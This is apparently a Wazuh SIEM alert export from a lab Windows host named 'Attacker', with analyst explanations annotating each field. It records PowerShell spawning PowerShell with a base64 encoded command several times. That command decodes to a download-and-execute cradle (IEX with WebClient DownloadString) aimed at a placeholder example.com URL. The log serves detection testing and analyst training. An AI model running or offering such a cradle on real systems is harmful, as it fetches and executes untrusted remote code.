data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bcec-680a-e50a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 1468 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 38 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534223.1196783 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:36:32.3062006Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 282850 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:36:32.285
ProcessGuid: {94294ddc-bcee-680a-e70a-000000000e00}
ProcessId: 11608
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_ss5qtls3.nav.ps1
CreationUtcTime: 2025-04-24 22:36:32.285
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:36:32.285 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bcee-680a-e70a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 11608 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_ss5qtls3.nav.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:36:32.285 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 35 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534224.1199552 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:36:34.8707334Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 282895 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:36:33.276
ProcessGuid: {94294ddc-bcf1-680a-e90a-000000000e00}
ProcessId: 9396
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bcee-680a-e70a-000000000e00}
ParentProcessId: 11608
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:36:33.276 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bcf1-680a-e90a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 9396 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bcee-680a-e70a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 11608 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 39 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534224.1207619 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:36:35.2004628Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 282896 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:36:35.096
ProcessGuid: {94294ddc-bcf1-680a-e90a-000000000e00}
ProcessId: 9396
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_loeo3cho.3ts.ps1
CreationUtcTime: 2025-04-24 22:36:35.096
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:36:35.096 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bcf1-680a-e90a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 9396 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_loeo3cho.3ts.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:36:35.096 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534224.1210384 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 4624 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 12544 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:36:37.6992031Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 43836 Incremental log record number – handy for timeline order.
data.win.system.processID: 792 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 888 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Security No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: AUDIT_SUCCESS TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "An account was successfully logged on.
Subject:
Security ID: S-1-5-18
Account Name: ATTACKER$
Account Domain: WORKGROUP
Logon ID: 0x3E7
Logon Information:
Logon Type: 5
Restricted Admin Mode: -
Remote Credential Guard: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: S-1-5-18
Account Name: SYSTEM
Account Domain: NT AUTHORITY
Logon ID: 0x3E7
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x304
Process Name: C:\Windows\System32\services.exe
Network Information:
Workstation Name: -
Source Network Address: -
Source Port: -
Detailed Authentication Information:
Logon Process: Advapi
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserName: ATTACKER$ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectDomainName: WORKGROUP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserName: SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetDomainName: NT AUTHORITY No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonType: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonProcessName: Advapi No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.authenticationPackageName: Negotiate No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {00000000-0000-0000-0000-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.keyLength: 0 Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.
data.win.eventdata.processId: 0x304 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processName: C:\\Windows\\System32\\services.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.impersonationLevel: %%1833 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.virtualAccount: %%1843 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLinkedLogonId: 0x0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.elevatedToken: %%1842 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 36 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534225.1217719 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:36:39.0226447Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 282962 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:36:36.380
ProcessGuid: {94294ddc-bcf4-680a-eb0a-000000000e00}
ProcessId: 14892
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bcf1-680a-e90a-000000000e00}
ParentProcessId: 9396
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:36:36.380 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bcf4-680a-eb0a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 14892 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
